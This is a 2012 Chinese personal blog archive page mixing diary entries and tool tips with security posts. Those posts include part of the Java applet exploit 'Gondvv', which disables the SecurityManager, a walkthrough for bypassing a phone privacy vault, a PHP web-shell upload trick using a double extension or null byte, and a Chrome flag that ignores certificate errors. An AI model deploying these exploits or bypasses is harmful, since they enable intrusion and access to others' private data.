博文

目前显示的是 八月, 2012的博文

AD

top-level-universal-xss 马克及联想

今天又同学提到由于同源策略的限制,xss只能获取当前域的cookie。但如果顶级域名有xss的话,将会影响到其所有的下属域名。于是我脑子里面飞转,先回忆了一下前几个月看《白帽子》时候看到同源策略。然后又联想了几个可能实施的方法。再次MARK一下。
       原设想:如果http://cn.是一个网站,并且该站点存在XSS,那可能会影响到例如163.cn,sina.cn等所有的网站,可以获取他们的cookie。因为不受同源策略影响,他们本来就是一个域。       我的设想:是否存在DNS无法正常解析的字符,因为现在可以注册中文域名。如果有无法解析的字符。而DNS或者URL解析的时候,会忽略掉无法解析的。那么可以构造出来这样的顶级域名。
       后来问了一下,某同学的指点:应该是不存在不可识别这个说法,但是根据不同的web服务器特点会有一些特殊的情况。比如;号后边的不去解析;从左边开始解析;第一个后缀名后边的自动舍弃;从右往左解析等情况。
        第二个联想,利用“;”分号或者从右向左解析等规则,构造顶级域名。
这个是那个同学看的原文:https://superevr.com/blog/2012/top-level-universal-xss/?utm_source=rss&utm_medium=rss&utm_campaign=top-level-universal-xss

国人要雄起?——java 0day exp 马克

package cve2012_java_0day;
import java.applet.Applet;import java.awt.Graphics;import java.beans.Expression;import java.beans.Statement;import java.lang.reflect.Field;import java.net.URL;import java.security.*;import java.security.cert.Certificate;
public class Gondvv extends Applet{
    public Gondvv()    {    }
    public void disableSecurity()        throws Throwable    {        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);        Permissions localPermissions = new Permissions();        localPermissions.add(new AllPermission());        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {            localProtectionDomain        });        SetField(Statement.class, "acc", localStatement, localAccessControlContext);        loc…

360手机卫士-----360隐私保险箱测试已经证实可以绕过密码

图片
【转载请注明来源-------http://hi.baidu.com/no_hack   夜翼】



   昨天测试完金山毒霸,已经很瞌睡了。于是躺下又玩起手机,我手机上安装了360安全卫士,里面有个隐私保险箱,于是就又来了兴趣想测试下它的安全性。

    目前在 miui系统中可以用第一种或者第二种办法绕过,在其它的安卓系统中可以用第二种办法绕过。

先看第一种:





                                              【360隐私保险箱】




【360隐私保险箱】官方描述:


加密私密照片,远离“门”事件
手机里有和家人、朋友、爱人的合照?手机随手放在桌上,被朋友拿过去围观?不用担心,有了360照片保险箱,您的私密照片会加密存储在保险箱内,只有输入正确密码才能访问哦~


批量加密文件,方便快捷
私密照片和视频太多,一个一个挪进保险箱,真的好麻烦~ 360照片保险箱提供批量加密文件功能,让您一键把文件放入保险箱,从此无忧!

密码找回功能,再也不用担心忘记保险箱密码
论坛、邮箱账号密码太多,现在又加上保险箱密码,记不住,怎么办?360保险箱提供方便的问答形式,您只要设置一个自己能轻松回忆起来的问题和答案,就能方便的找回密码。

用相册管理你的照片,不再为大海捞针的寻觅发愁
在保险箱中直接打开加密文件,安全方便
帮您加密记录微博、邮箱、网银、游戏、银行账号等密码信息,再不用为忘记各种各样的账号密码烦恼
用密码保护您的隐私程序,保护您的小秘密
防暴力破解保护功能,再也不用担心他人恶意获取保险箱密码
自动锁定,时刻保护您的隐私不被窥视







我用它加密了我手机内的短信,然后来验证它的安全性。















当我打开短信的时候,出现了下面的提示:









这个时候,我们可以来利用下百度输入法的输入方式,选择 “位置”“图片”“录音”输入都可以,随便选一个,如图:










选择完成后,便成了下图显示的样子,隐约已经可以看见短信了:








这个时候,miui系统的 四大金刚键的“主页”键已经可以用了。长按不放便出来了任务管理器。

选择“任务管理”,如图:







找到 “360隐私保护保险箱”的进程,然后.......










强制结束掉它,便可以了!














强制结束完后,我已经可以毫无障碍的查看手机内的短信了~~~







微博也是一样,通过上面的办法,完全可以结束掉进程,撤销防护~~









下面看第二种办法:    

      对于不是miui系统的人来说,结束掉它变得更加简单!也更…

电影格式

RMVB -------- 内嵌字幕的版本,体积小,适合对画面要求不高,懒得外挂字幕的同学观看。
MP4----------- 绝大部分是内嵌字幕版本,如果文件名里没有CN或者 Chi_Eng之类的字样就是无字幕。比RMVB清晰不少,代替RMVB的新格式,也可以在移动设备上观看,通用性强。HR-HDTV---- 内嵌字幕清晰版本,适合大部分人观看下载,画面较好,或者收藏使用。HDTV---------无字幕普通版片源,画面质量类似DVD,适合独立外挂字幕看。DVD-----------无字幕官方发行版,质量比DVD和MP4好,且是外挂字幕的片源,适合学习外语的,或者不喜欢内嵌字幕的观看,体积比RMVB大,比HR-HDTV小。720P----------无字幕高清版,准高清画面,适合对画面要求高的人。1080P--------无字幕全高清版,适合要求非常高的人看或者收藏WEB-DL------无字幕高清版,比电视的720P高清清晰度好,且无乱七八糟的台标和里面的动画广告。推荐。BD-720P-----无字幕蓝光高清版,收藏用BD-1080P---无字幕蓝光全高清版,收藏用。3D-------------3D版片源,需要电视机或者显示器支持3D模式才可观看,一般是左右画面的3D影片。OST-----------影视原声集。 就是片子里的音乐。游戏-----------影片对应的游戏,有些片子会独立出游戏的。 

CC攻击原理、现象、防护之防护

CC的防护:第一种方法:前面讲到,CC攻击是使用的真实IP,真实IP比较固定,可以使用一个小的程序来读取网站的IIS日志,分析出其中的IP地址,最后使用安全策略封禁。VBS代码:Set fileobj=CreateObject("Scripting.filesystemobject")logfilepath="E:w3logW3SVC237ex070512old.log"    '注意指定受攻击网站的日志路径。'如果是虚拟主机,要查是哪个网站受攻击,可以查看:C:WINDOWSsystem32LogFilesHTTPERR ,根据错误日志很容易分析出来。writelog "netsh ipsec static add policy name=XBLUE"writelog "netsh ipsec static add filterlist name=denyip"overip=""f_name=logfilepath'指定日志文件'程序功能:把logfiles中的IP提取成ipsec需要的过滤格式,导入ipsec中过滤。适合某个网站受大量CC攻击的情况。set fileobj88=CreateObject("Scripting.FileSystemObject")Set MYFILE=fileobj88.OpenTextFile(f_name,1,false)contentover=MYFILE.ReadAll()contentip=lcase(contentover)MYFILE.closeset fileobj88=nothingon error resume nextmyline=split(contentip,chr(13))for i=0 to ubound(myline)-1    myline2=split(myline(i),"")    newip=myline2(6)    '指定分离的标识字符串!    if instr(overip,newip)=0 then '去除重复的IP。        overip=overip&newip       d…

时间的失眠

时间最狗血的,不是电视或者电影中的情节曲折,而是时间……
最近越来越发现,不知何时,已经是大叔了,从来没发觉拥有过的青春,既然已经和我无关了。最近总是有些恍惚,恍惚间思绪会回到某个时空,有偷偷溜出去上网,有突然的大学将校园里的树枝全部压断……那里有着我的执着,有着我的依恋……周五,一周的工作又告一段落,记性不好的我,因为没有带数据线,所以只能在地铁上握着一个快要没电的手机,疲惫的随着人流麻木向前。快要达到换乘站的时候,终于可以坐下来。此时发现,已经逐渐空旷的车厢对面,坐着一个女人,面容依稀可以看到“她”的倔强。自然她此时此刻是不大可能出现的。但看着这个面容,心中突然想起一句话:“真是狗血的时间”。似乎是早已忘记,在这个不经意间想起。似乎是被世俗的忙碌逐渐淹没,在此时短短的休憩中偶然触碰。总之,很多的东西已经随着时间的流淌,而走远,不是忙?
每一天,梦中是都是满满的疲惫。于是每个凌晨的夜里,孤寂,无所事事,一点点消耗时间,而又不愿浪费时间在辗转反侧中。

用电脑从 Google Play 下载 Android 程序 apk 文件

图片
由于谷歌的限制,Android市场上的软件和游戏必须通过手机才能下载,但由于种种原因,比如你的手机没有Google套件,设备不兼容以及不支持你所在的国家和地区的缘故,不过可以一个Chrome插件就可以帮助你解决这个问题,直接从电脑上下载市场上的APK。

首先你需要下载Chrome浏览器,插件要求版本在Chrome 17以上,所以建议使用最新版本。

安装完毕后需要在Chrome的快捷方式选项卡中的“目标”最后面加入

C:…chrome.exe --ignore-certificate-errors --allow-running-insecure-content

       或者

     “C:…chrome.exe” --ignore-certificate-errors --allow-running-insecure-content

如图1。



图1

我的是XP,需要在引号后面加上参数内容。



进入Chrome,你需要下载apk-downloader插件,这个是文章的主角,下载完成后会蹦出设置选项(如图),如果没有出来就需要你到扩展程序里找到apk-downloader,然后点选项。(如果你没有进行第二项操作,则会出现如图3的警告提示。)



图2



图3

Email和Password分别填写你的Google帐号和密码,Android Device ID最好不要随便填,插件作者在原文中提到,如果随便填,可能无法正常工作。你还可以在登录后选择你要伪造的国家和运营商代码(这个不知道有神马用,我是老老实实的填了)。



好了,完成以上步骤后,再打开一个市场上的软件,你就可以在地址栏的右边看到直接插件下载的标志了(如图),点击就可以下载了。Enjoy It.



其他注意事项:

如果Google账户开启了二次验证,需要专用密码登录,否则提示密码错误。

Android Device ID 获取方式,在你的手机拨号界面输入“*#*#8255#*#* ”,然后在出现的界面可以找到Android Device ID,注意输入的时候,不要输入前面的“android-”字符

这个东东是没办法下载需要付费的Google play应用的!!!



最后附上插件作者的原文地址。

http://codekiem.com/2012/02/24/apk-downloader/




Android病毒 MMarketPay.A

一种名为 MMarketPay.A 的新型手机病毒已经在中国传播,目前已有大约 10 万台手机感染,涉及国内的 9 个应用商店。这个病毒是由 TrustGo 发现的并将其命名为 ‘MMarketPay.A’ — 该恶意软件会自动从中国移动的应用商店(M-Market)购买软件。而且 TrustGo 提供证据表明下列第三方的应用商店的应用已经受影响:nDuoaGFanAppChinaLIQUANFONESoft.3g.cnTalkPhone159.com 和 AZ4SD.当用户从这些商店中下载被感染的应用时,可能会存在账单累积的风险。MMarketPay.A 可以屏蔽短信安全步骤,无需用户确认直接定制来自 M-Market 的收费服务。TrustGo 团队解释 M-Market 支付系统的工作原理,以及病毒是如何破解:
用户登录到 M-Market 网站 (http://mm.10086.cn/).如果你使用 cmwap 接入点则会自动进行登录,一旦你购买某个应用或者内容时,M-Market 会通过短信发送一个验证码到你手机,你需要在购买时填写这个验证码。一旦验证过程完成,就会自动下载应用,然后中国移动会将从你手机中扣除购买应用的费用。[The virus] MMarketPay.A 可自动通过 M-Market 支付系统发起订购首先将 APN 修改为 CMWAP,这样就可以自动登录 MMarket找出收费应用,并在后台模拟点击行为屏蔽掉接收到的短信,并从短信中获取验证码,如果要求 CAPTCHA 图片,则发送到远程服务器上去分析验证码。提交验证码给 M-Market 服务器下载应用让用户买单M-Market 同时包含很多收费的视频内容,病毒同样可以搜索、播放和下载这些内容,而这个过程对手机用户来说是不知道的。MMarketPlay.A 目前只影响国内的应用生态系统,Google Play 不受此影响。

PHP S3上传漏洞

漏洞影响:可以任意上传PHP,TXT,JPG,PNG格式文件利用:http://hi.baidu.com/new/b1acknight/up/img/Sh3ll.php.jpg将shell重命名为sh3ll.php.jpg 或者 sh3ll.php%0%0.1.jpg抓包:114782935826962Content-Disposition: form-data;name="MAX_FILE_SIZE"1048576-1147829358

一只漂流瓶带来的后续危害:漂流瓶飘来的可能是愿望,也有可能是XSS!

一只漂流瓶带来的后续危害:漂流瓶飘来的可能是愿望,也有可能是XSS!

古代中国的数字单位:
大数   一、十、百、千、万、亿、兆、京、垓、秭、穣、沟、涧、正、载、极、恒河沙、阿僧祇、那由他、不可思议、无量大数
小数  分、厘、毛、糸、忽、微、繊、沙、尘、埃、渺、漠、模糊、逡巡、须臾、瞬息、弹指、刹那、六德、虚空、清净、阿赖耶、阿摩罗、涅槃寂静

个、
十、数字后1个0
百、数字后2个0
千、数字后3个0
万、数字后4个0
亿、数字后8个0
兆、数字后12个0
京、数字后16个0
垓、数字后20个0
秭、数字后24个0
穰、数字后28个0
沟、数字后32个0
涧、数字后36个0
正、数字后40个0
载、数字后44个0
载之后,是:极恒河沙、阿僧只、那由他、不可思议、无量、大数
极恒河沙、数字后48个0
阿僧只 、数字后52个0
那由他 、数字后56个0
不可思议、数字后60个0
无量 、数字后64个0
大数 、数字后68个0

宿梦

刚才突然想起来,昨晚做的什么梦了——是被雷劈,各种雷啊,比尼玛修正小说里面的什么至高天劫给力多了。囧啊。昨晚被劈了一晚,今早还能安好。真不容易啊。

无边的落寞

不知道为什么,突然感觉这么无聊和空虚,熬过了腹泻和感冒。和TA们聊过了天,这个时空又只剩下自己一个人, 此时此刻,深深的思念爱3中的那些可爱的人。当幻想和现实交叠,那个美丽的梦总是让人不愿醒来,里面那些美好的事情,真希望可以永远继续。在那些美好的事情发生的时候,我们总是非常期待结局,因为结局可以带给我们所有的美好。我们想要的不是结束,而是结局那些溢满心胸的美好。
       下午Y打来电话,寒暄过后问有空没,过两天去接她。难道我的价值就只体现在别人需要帮忙的时候吗?没有惊喜,没有其他,都已经平淡如水,随时间的河流流远了。



我的三个世界

现在总是感觉时光流转,风景变幻,总是感觉自己生活在三个世界中,不断迷失自己。今天早上不知道是不是昨晚着凉了或者吃了不干净的东西,大早上就跑卫生间一泻千里,整个人腿都软了。中午撑着洗完了衣服,感觉浑身酸疼,而且发烧了。没办法,勉强拖着没有力气的身体,下去吃了点饭,补充了些能量。终于发觉一个人漂泊在外的难处了。
昨晚和清影蓝心聊天的时候,讲到,我似乎生活在三个时空彼此交错的世界里。老家、平常工作、影视中的。这三个,最明显的是平常工作和影视中的这两个,他们彼此交错堆叠。我们生活在影视中故事发生的城市、地方,却似乎总是触摸不到影视中的那种生活。

UE教程、使用问题及正则教程

问题1:如何去掉所编辑文本中包含特定字符串的行?

这则技巧是在UltraEdit的帮助文件里有。CTRL+R 调出来替换(Replace)窗口,选中"使用正则表达式",然后用查找 "%*your string*^p"(不包含括号,下同。) ,替换成空内容即可。

注意:“^p” 是 DOS 文件类型的换行符.如果是 Unix 类型文件,则用“^n”。



问题2: 如何在行末添加特定字符,比如逗号?

CTRL+R 调出来替换(Replace)窗口,选中"使用正则表达式",查找 “^p”(或者“^n”,如果是Unix 文件),用“^p”(或者“^n”)进行"全部替换"即可。

注意:如果是 MAC(Apple) 类型文件,则换行符号为“^r”。



问题3: 如何删除空行?

查找 “^p$” 然后替换为空即可。



问题4: 编辑文件如何加入时间戳 ?

F7 快捷键即可。



问题5: 为何 拷贝(Copy)/粘贴(Paste)功能不能用了?

如果发现使用 UltraEdit 的过程中拷贝与粘贴的内容不匹配。是因为UltraEdit有10个剪切板(clipboard),分别用Ctrl+0 - Ctrl+9 切换。 Ctrl+0 是 Windows 的,其他则为用户自定义的。在使用的过程中错调用了 CTRL+n。



问题6:打开很小的文件也延迟

每次打开文件的时候总有几秒钟的耽搁,即使是很小的几个字节的文件。这是网络打印机搞得鬼。打开"高级"->"设置"->"编辑器"->"高级",看看是不是选中了"载入/恢复打印机设置"?如果是的话,去掉(不同的版本/汉化与否可能该位置所在有差别)。



问题7: 删除当前行内容

CTRL+E



问题8:删除特定字符(#)开头的行

%#*$



正则教程:



删除空行: 替换 %[ ^t]++^p 为 空串



删除行尾空格: 替换 [ ^t]+$ 为 空串



删除行首空格: 替换 %[ ^t]+ 为 空串



每行设置为固定的4个空格开头: 替换 %[ ^t]++^([~ ^t^p]^) 为 " ^1"



每段设置为固定的4个空格开头: 替换 %[ ^t]+ 为 " "

(如果一行是以空格开…

当UE遇到正则——正则匹配IP地址

图片
最近手头有个项目,需要大量处理很多数据,要从浩如烟海的垃圾数据中挑选出来对我有用的数据,于是很久不用的UE又登场了。       在将PDF报告内容转存到TXT里面后,我需要获得以下数据:       1、里面所有的IP地址;       2、里面除IP及漏洞名称外的文字全部删除;       一行行删除是在太不靠谱了。于是想到了正则,环境封闭,我用手机搜索了半天,找到了一条匹配IP地址的正则,可是为毛输入里面选择正则还是不行呢?后来查阅了帮助文档后,才发想,UE的正则分三种形式,UE、UNIX、和PERL。我寻找的正则是PERL格式的。所有提示不是合法的正则。后来在选项里面选择PERL后,果然匹配到了,高兴啊。附上截图一张:
再附上两条正则:([0-9]{1,3}).([0-9]{1,3}).([0-9]{1,3}).([0-9]{1,3})PERL 匹配IP地址。
^(([0-9]{1,3}).([0-9]{1,3}).([0-9]{1,3}).([0-9]{1,3})).*$PERL 匹配IP开头的行。

无言

XX(修者……,请自行填充)是一种追求力量和强大的存在,他们本就该向着可以让他们强大的地方聚集,而不是应该倒过来,成为腐朽和落后的保护者。那样的话,除了让他们自身慢慢跟随着他们保护的东西一步步走向落后和腐朽,并无它用!!! 

7|-|3R3 12 N0 5|_|(|-| 7|-|1N' 42 /<01N(1|)3N(3, _||_|57 73|-| 1|_|_|_|510N 0|= /<01N(1|)3n(3 1753|_|=. 

7|-|15 V1549e, N0 |/|ERe VEneEr 0F V4n17-/...15 4 VE5719e 0f 7E|-| v0>< |>0|>|_||_1,n0|/ v4<4n7, V4n15|-|e|).

This visage, no mere veneer of vanity...这个面孔,不只是虚华的外表...is a vestige of the vox populi,now vacant, vanished.它是遗存的人民呼声,现已空洞消亡

DefCon's Ninja Tel pirate cell phone network

DEFCON 忍者 GSM 网络视频.高度定制的HTC手机,帅的,只能看着流口水了。